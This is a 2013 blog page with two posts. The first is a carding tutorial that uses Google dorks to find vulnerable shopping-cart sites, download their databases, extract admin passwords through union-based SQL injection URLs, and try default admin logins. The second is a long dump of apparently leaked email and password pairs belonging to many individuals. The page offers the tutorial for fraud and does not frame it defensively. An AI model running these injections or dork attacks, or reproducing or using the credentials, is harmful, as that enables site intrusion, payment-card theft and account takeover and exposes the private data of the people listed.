Chủ Nhật, 2 tháng 6, 2013

Carding Using google dorks! 2013

Carding dorks 
(!)

Code:

google.com:--> allinurl:/shop/category.asp/catid=
target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
exploit :--> /admin/dbsetup.asp
target whit exploit :--> www.xxxxxx.com/admin/dbsetup.asp
after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
in db look for access to find pass and user of shop admins.

(2)
Code:

google.com:--> allinurl:/commercesql/
target looks like :--> www.xxxxx.com/commercesql/xxxxx
exploit :--> cgi-bin/commercesql/index.cgi?page=
target whit exploit admin config :--> http://www.xxxxxx.co..../admin_conf.pl
target whit exploit admin manager :--> http://www.xxxxxx.co....in/manager.cgi
target whit exploit order.log :--> http://www.xxxxx.com....iles/order.log

(3)
Code:

1/search google: allinurl:"shopdisplayproducts.asp?id=
--->http://victim.com/shopdisplayproducts.asp?id=5

2/find error by adding '
--->http://victim.com/shopdisplayproducts.asp?id=5'

--->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467

-If you don't see error then change id to cat

--->http://victim.com/shopdisplayproducts.asp?cat=5'

3/if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password

--->http://victim.com/shopdisplayproduct...on%20select%20 1%20from%20tbluser"having%201=1--sp_password

--->error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of column in the two selected tables or queries of a union queries do not match......

4/ add 2,3,4,5,6.......until you see a nice table

add 2
---->http://victim.com/shopdisplayproduct...on%20select%20 1,2%20from%20tbluser"having%201=1--sp_password
then 3
---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sp_password
then 4 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sp_password

...5,6,7,8,9.... untill you see a table. (exp:...47)

---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sp_password
---->see a table.


5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password

--->http://victim.com/shopdisplayproduct...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password

6/Find link admin to login:
try this first: http://victim.com/shopadmin.asp
or: http://victim.com/shopadmin.asp


Didn't work? then u have to find yourself:

add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password

--->http://victim.com/shopdisplayproduct...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password


you'll see something like: ( lot of them)

shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
..............

then guess admin link by adding the above data untill you find admin links

(4)

Code:

Type: VP-ASP Shopping Cart
Version: 5.00
Dork = intitle:VP-ASP Shopping Cart 5.00
You will find many websites with VP-ASP 5.00 cart software installed
Now let's get to the exploit..

the page will be like this ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is : diag_dbtest.asp
so do this:
****://***.victim.com/shop/diag_dbtest.asp

A page will appear with something like:

xDatabase
shopping140

xDblocation
resx

xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this:
****://***.victim.com/shop/shopping140.mdb
if you didn't download the Database..
Try this while there is dblocation.
xDblocation
resx

the url will be:
****://***.victim.com/shop/resx/shopping140.mdb
If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb

download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com

inside you should be able to find *** information.
and you should even be able to find the admin username and password for the website.

the admin login page is usually located here
****://***.victim.com/shop/shopadmin.asp

if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are

Username: admin
password: admin
OR
Username: vpasp
password: vpasp
Admin vào lúc Không có nhận xét nào:

Thứ Bảy, 1 tháng 6, 2013

mail pass

achieverprince@gmail.com 9442748736
Achillesy@gmail.com fuckfuck
achkasovroman@mail.ru 7ppv11
achmatsudrajat@gmail.com adjats
acho01@abv.bg 03071991
achord@tianya.cn 771018
achqar@gmail.com doojie
achraf.9663@gmail.com cb1cb2
achraf.mabrouk@voila.fr asma1979*
achunk17@gmail.com samsul
acid.klinxk@gmail.com aaaa
AciD@lol.lt 868515361
acktito@gmail.com Dahuol1
acomputersciencestudent@gmail.com shaitan
acousticheads@gmail.com guitar
acromeu2010@yahoo.es claudinho
acror@br.inter.net 030722
acs.alansilva@gmail.com acs267486
acsalamanca@gmail.com qwedsa
acsistemas.empresa@gmail.com AC2012
actech@inbox.com 991260
actionkamenxyz@gmail.com abc123
actisolweb@gmail.com vaticano22
active@v.gg 713277
activeggl@gmail.com hacking123
actsramana@gmail.com success
act_designstudio natasha
act_mohammad_god@yahoo.com steve
Acuspramana@yahoo.com 05121990
ad69chou@pchome.com.tw ad1234
ADABROWIECKI@HOTMAIL.COM LEPEK1955
adailton_ls@hotmail.com 414152
adalita_love@hotmail.com annalisa
adam1213@gmail.com findfind
adam@inspiresoft-uk.com natalie
adamodoom@nana.co.il golgi3s
adamrenan@yahoo.com.br rams
adam_uzak@hotmail.com karadere
adapabharath@yahoo.com 12345
adaragao@gmail.com sd71523
adatapost@gmail.com mayuri
adawat2010@yahoo.com a123456789
addiati@yahoo.com addiati
addo.delgrossi pwshort
addrtech@gmail.com forhosting
adeeliqbal4@yahoo.com toughguy
adeeljugno@gmail.com 110vesana
adeeljugno@yahoo.com 39669101
adegokeralph@yahoo.com 1978ade
adekas00@gmail.com jayanusa
adeladel.1363@yahoo.com epazhakh
adelekefrancis@gmail.com Francko
adelmis@roshd.ir a1d3e7l0
adelsabour Allah!23
adelsabour@gmail.com Allah!23
adem232008@hotmail.fr adem1996
adem_aysegul33@hotmail.com kanka33
adenilson.ini@gmail.com master
adexire@sify.com london12
ade_ofik@yahoo.co.id allah
adham.noser@gmail.com 2011+-*asd
adhapodkar puranpoli
adhencreatif@gmail.com a227889
adhiet_80@yahoo.com amestys
adhy_pati@yahoo.com febrika
adh_202114525@yahoo.com.sg 4537
adi.millis@gmail.com am3811
adi.tkj09@yahoo.com adisaputra
adi44@o2.pl 140463
adichare@hotmail.com lmachrabia
adiebobik@hotmail.co.id yaroojaq
adiegovq1@peru.com chavelo12
adiet.timika@gmail.com 150989
Adig94@o2.pl adrian
adiiloux3@gmail.com azerty
adiiloux3@hotmail.com azerty
adil.skhan007@gmail.com 9827437647
adilhassaun21@gmail.com 2187
adilmt@gmail.com docofone
adilsethi@gmail.com shell
adinan_reis@hotmail.com a8041045r
adinnc@gmail.com november
adin_dian@yahoo.com coler
adire_zaremi@hotmail.com 12345
adison.peng@gmail.com 518598
aditku33@gmail.com avatar
adittya_ti@yahoo.com fm1234
aditya.sakhuja@gmail.com BaaN123
aditya86.sharma@gmail.com jbmkjgmk
adityarai74@gmail.com adityarai
adityashrm@gmail.com aditya161
aditya_198910@yahoo.com 9580888317
aditya_pirates@yahoo.co.in vicecity
adjiee84@gmail.com SMUNDA
adjie_26091987@yaoo.com 123456789
adju5t_githu@yahoo.com 110887
adjust_zone90@hotmail.com issahack
adlrahim@yahoo.com imm947
adm.dahuol.corp@gmail.com holadahu0l
adm.erawebdesign@gmail.com 261286
adm1npwner@live.com 0digimon0
adman0wnz@yahoo.com huntad18
admfodao@msn.com leleteamo
admgr5 grupa12345
admholight@hotmail.com val3102
admhost01@gmail.com aninha23
admhost1@gmail.com aninha23
admimirastor@mynet.com 1988
admin access
admin.itechmedia@gmail.com admin@143
admin.kiss@gmail.com 0986241086
admin.kmts@gmail.com rambozo
admin.revolutioncheats@gmail.com 2103516
admin.vegas@mail.ru vegaspass
admin947@gmail.com cibolles
admin@3dcafe.ru house1
admin@3ecafe.ru house1
admin@5gigsfree.tk qazwsx
admin@anly.info danly20
admin@aunk.uni.cc 191142097
admin@chkenterprices.com vlkodlak
admin@dizaina.net.ru 90268209
admin@donnavitasovich.co.cc ipcheil124
admin@dotservant.com batman
admin@forums.do cougar
admin@freewebhostprovider.com boydbear
admin@frehostingplus.com ozzyzz20
admin@frewebhostingplus.com cortez
admin@h0sthq.com 5]i$#;^A!
admin@haiduongsao.com 123456
admin@hosting4unow.com boo2u2ok
admin@hostwoot.com bluepoint1
admin@interwave.co.uk access
admin@interworld.co.il 24794333
admin@ixspace.com creative
admin@jyco.co.uk runner09
admin@karz.uni.cc 654321
admin@limeedit.org yalw6yej6
admin@liod.uni.cc gabbychan
admin@mastipak.com hamid1234
admin@mfaizan.com katakhijau
admin@microturk.net 2495545
admin@mnme.org yuanzy
admin@myspacehaxx.profil.bz makiba
admin@myuxd.com y041398
admin@newbreef.com keston
admin@ph42hosting.co.cc Xenocide
admin@pridezhost.com micker
admin@primehosts.co.cc myPassword
admin@redskillz.nl route66
admin@sabwebhosting.com celicagt4r
admin@sharmail.co.cc shaz88
admin@simseb.be axelalex
admin@stapel.ru gym5*5
admin@sultansm.org shahnaz
admin@t-kmail.com rafeeq@123
admin@thewantedhost.com bchappill9
admin@try2troubleshoot.com 12581258
admin@tubehosting.co.uk bluepoint
admin@usoara.ro 123456
admin@utpa.ru 228228
admin@velesteam.org admin
admin@websinch.com 160694
admin@xwebdev.com 147896325
admincnttvn@gmail.com 21041989
admingroop@mail.ru lcdlcd2
adminhacktr@gmail.com 11752116
administrator@bedoksac.org applepie
adminjhay@gmail.com jhaygem19
adminportal@gmail.com 8642801
admin_dm@telkom.net komunitas
admin_egyshope@hotmail.com admines
admin_hop@ztarforum.com 900702
admirid@hotmail.com 112233
admnistrator_ymail@yahoo.com P@sswd
admon_0108@hotmail.com cartagena
admrevanchero@hotmail.com 1210LeTh07
admwilkem@hotmail.com 220403
adm_darkzerox@live.cl 197319
adm_mysql@interia.pl bazaogame3
adn83an@yahoo.com engageqd
adnan13jalil@gmail.com adnan
adnan4721@yahoo.com aikmanA1
adnane-linus 123698745
adnane_linus@hotmail.fr 123698745
adnan_bazergan@yahoo.com adnan
adodson1510@hotmail.com quantum
adolf_249@yahoo.com smun33
adoniskzin@gmail.com 1234567890
adorohabbo@gmail.com 61526271
adorxx@hotmail.com yahooo
adrenalinazero20@hotmail.com 636465
adress@live.com 123698745
adrhipt@hotmail.com villazon
adri@nusa.net.id adri
adrian.guinazu@hotmail.com.ar ezctd93175
adrian.kudrawiec@wp.pl adrian13
adriana_beristain@hotmail.com javady28
adriano.sa21@gmail.com 304141
adrianopons@gmail.com adriano
adrianosf@uol.com.br 0184224
adriano_luis_souza@hotmail.com recanto
adrian_mogos_sibiu@yahoo.com ladylady
adrien_chalamet@hotmail.com irene34
adrivar@bol.com.br jesuss
adsldhung@vnn.vn 678279
adsoft@inbox.lv panther
adsol@dbvn88.net ADSOL2008
adsonvinicius@gmail.com adson
adty1987@yahoo.com.vn anhdung
adua_pajajaran@yahoo.com gelandang
adul.w@cdg.co.th 40111641
adu_dirtbug@yahoo.com acomss
advertise@sanjr.0lx.net sRaithath
advertiser@tddhost.com master
adviser001@maktoob.com 123456
adyank@plasa.com 281283
adzcercado@yahoo.com oisf4laxio
ad_0@hotmail.fr 071068
aebecks@homail.com 077348160
aeconsolacaoevida@gmail.com agueda2009
aeh.lonely@gmail.com ch03rud1n
aendran@ymail.com 420420
aeo2t@hotmail.com kattahqaz1
aeroxthebest@gmail.com schatjuh
aesayah@hotmail.co.uk 753215987
aevx@hotmail.com 123456
afgblueboy@gmail.com 12657
afik_t_king@nana.co.il tbhnkl?!
afixibiranchi guess
afkewalstra@hotmail.com 310388
afmaco666@yahoo.com salamrt6
afragop@gmail.com af200119
afrezaandry@rocketmail.com 1542824
afridalines@yahoo.co.id executors
afshan_irshad@hotmail.com catter26
afshin_davar@yahoo.com afshin10
aftabsaad@hotmail.com sohail
aftab_saad@hotmail.com sohail
afzal3565@yahoo.com afzaal
afzalqu@yahoo.com 123japan
afzal_01@yahoo.com amiafzal
afzam.ads@gmail.com 240979
aga.popielow@gmail.com czarnulka
agae.tw@yahoo.com.tw 71527
againstc202@gmail.com sajjusajju
agamenon.pimentel@gmail.com mnq6780
agancqu@163.com cquagan
agano@yahoo.com free2010
agdalb@hotmail.com soko23
agenda@mailinator.com falcon
agent.joe@web.de super0
agent.sinikael@gmail.com killer690
agentfredwhite@gmail.com jumpy4see
ageofzetta@gmail.com ageofzetta
aggreko07@gmail.com 3bsoftwa
aghatalwmo@ig.com.br 220388
aghil@smtp,ru 222856
aghili1501@gmail.com 000000
agmafara@yahoo.com hasanayg
agneau@abv.bg 121084
agnichakra.1984@gmail.com 663812
agoesh@gmail.com gemilang
agraha@rediffmail.com sairam
agrawaltarun@in.com vande
agssuf_005@yahoo.com alawiyah
aguilera-ram@hotmail.com 1532ram
agung_chy@ymail.com 220484
agupta720@gmail.com goodone
agus_ney@yahoo.co.id 672006072
AH503612@mail.ru ALEX_HX
ahabiba@gmail.com moha01011
ahad.hooshmand 1837184933
ahait.saudi@gmail.com mix2012
ahboyboi89@hotmail.com s8941563b
ahdail@gmail.com 031281
ahdy.atma@gmail.com ahdy00
aheartisdie@yahoo.com 200541
ahgoyal007@yahoo.com anish12345
ahmad oooooooo
ahmadalmahasneh@yahoo.com jordan1122
ahmadganjtabesh@gmail.com asdasdere
ahmadmmsa@gmail.com 1227
ahmadomar.java@gmail.com 123456
ahmadpoetra@yahoo.com kontol
ahmadsaib12@gmail.com saib001
ahmadsaleh1983@hotmail.com asm1983*
ahmad_dubai18@yahoo,com 128523
ahmad_jahanian@yahoo.com 3654771
ahmad_karam1200@hotmail.com 123123
Ahmad_olimat95@yahoo.com 00998877
ahmad_salimy@yahoo.com 104120
ahmad_saollahi@yahoo.com qazxswedc
ahmd.munir@gmail.com 1nd4hny4
ahmdshorty40@sbcglobal.net sga75baw
ahmed-messi2010@hotmail.fr 123456
ahmed.313@hotmail.com relaxrelax
ahmed.3abdolah@gmail.com azertyx
ahmed.algohary@yahoo.com cse2010
ahmed.dvoip@yahoo.com 123456
ahmed.elneweam@yahoo.com arafix66
ahmed.ezzat@healthy-it.com cke291ae
Ahmed.fouad@live.com AmrZymic
ahmed.ramy2010@yahoo.com 123456
ahmed.schawadfi@gmail.com google
ahmed3fire@yahoo.com 2222222
ahmedalbhsni@gmail.com 1234554321
ahmedaz63@gmail.com ahmedaz82
ahmedeitp@yahoo.com anam2000
ahmedfahmy258@gmail.com 2713816
ahmedgroup@msn.com 5umlc45
ahmedhk44@hotmail.com borntobe
ahmedsagb@hotmail.com freemann
ahmedshawky_1@hotmail.com 3885266
ahmedshousha@gmail.com ahmedghost
ahmed_5_84@yahoo.com hamada
ahmed_blakmagic@hotmail.com bigben
ahmed_dking@hotmail.com qwertyuiop
ahmed_elgayed@hotmail.com hamada
ahmed_fikry_2@yahoo.com 0101040577
ahmed_h261@yahoo.com yassen
ahmed_h261hotmail.com yassen
ahmed_kadry74@yahoo.com 123456
ahmed_monaya1@hotmail.com 5401530
ahmed_sakr@ci.menofia.edu.eg 0403514083
ahmetkaraman1.gmail.com 437142
ahmetkaraman1@gmail.com 437142
ahmetodabasoglu@gmail.com ahmet1988
ahmetokay124@hotmail.com 789689
ahmetshala_2000@yahoo.com eealga
ahmetshen@gmail.com pa88w0rd
ahmet_odabasoglu@gmail.com ahmet1988
ahmet_shkepi@live.com sildibjond
ahmet_tarik@hotmail.com 6232878
ahmet_x@hotmail.com 02581155
ahnatek@gmail.com XUPCv82nqR
ahoo@hroze.com 588629
ahopop12 040041712
ahqhgxzw@126.com 666666
Ahrnazemi@gmail.com 8432310225
ahsan.shaikh@gmail.com talibilm
ahsanhussain95@yahoo.com 786786
ahsanraza460@gmail.com 789456123
ahsbjunior@gmail.com fahid
ahshirkattack@yahoo.com password
ahsima@rediffmail.com iplt20
ahtyng2006@bk.ru 2367tigra
ahuerta@ing.uchile.cl demanda
ahwere_1983@yahoo.com.hk ahcool
ahzzhen2@163.com 123456
ah_nikookar@yahoo.com 123456
ah_sar@mynet.com 21101984
aidin_dotnet_59@yahoo.com 82111255
aigdonia@yahoo.com 315650372
aihgnnart@yahoo.com 10031984
aiikei@yahoo.com liuhui
aijperson@yahoo.com 123456
aik17r@mail.ru c14078911
aikazemi@yahoo.com ak778248
aikel.net mikero
aikel12@ mikero
aikel12ro@hotmail.com mikero
ail.yw.sk@gmail.com 000111
aillusions@gmail.com 666
ailtonguitar@hotmail.com 123456
ailton_alv3s@hotmail.com 101094
aimbootz@gmail.com 131190
aimn_ganay2001@yahoo.com 33439654
ainey_rosma@yahoo.com 100879
ainfantela@gmail.com rz0v4p
ainfconsultor@live.com jsp
ainflag@gmail.com XIRGU122
ainiyiwanbei@hotmail.com yinwei
aint@inbox.ru 47rOs539
aipi6nik@one.lv ebloban
aiquoc19@YAHOO.COM 222222
airbase@gmail.com spirited
airdem@mynet.com 56205620
airmax_reg@abv.bg 089769181
airolds_valmagia@hotmail.com Cevio85
airton@granarapida.com claudia
airy_arun@yahoo.com sohanwin
air_shohoku_14@yahoo.com basketball
aish.mehar@gmail.com myallah
aisha.itec@gmail.com aisha
aishiteiru_ianx@plasa.com database
aishwarya.singh78@gmail.com mastermind
aissaboulila@yahoo.fr aissasbo
AiSteel2008@gmail.com 5797895
aitanamarina@gmail.com pgc1963
aithoz@gmail.com hello@me
aiub_mamun05@yahoo.com 106667
aiwux@gala.net 123456789
aizadezad@yahoo,com 231011
aizadezad@yahoo.com 231011
aiza_sosexy@yahoo.com 221284
aiz_u_ddin@yahoo.com aizuddin89
ai_first@windowslive.com 987654321
ajair2@gmail.com ajair2
ajalil@evsoft.pk ajalil
ajan_salih@hotmail.com 6032521
ajatbdg@gmail.com bismilah
ajax.chien@gmail.com nysecofr
ajax1_leenders@hotmail.com 19503429
ajay.gaurkhede71@gmail.com 1a5star
ajay.pinnaka@gmail.com pinnaka
ajay.pinnaka@templetechnologies.com pinnaka
ajay.pinnaka@yahoo.com pinnaka
Admin vào lúc Không có nhận xét nào:
Đăng ký: Bài đăng (Atom)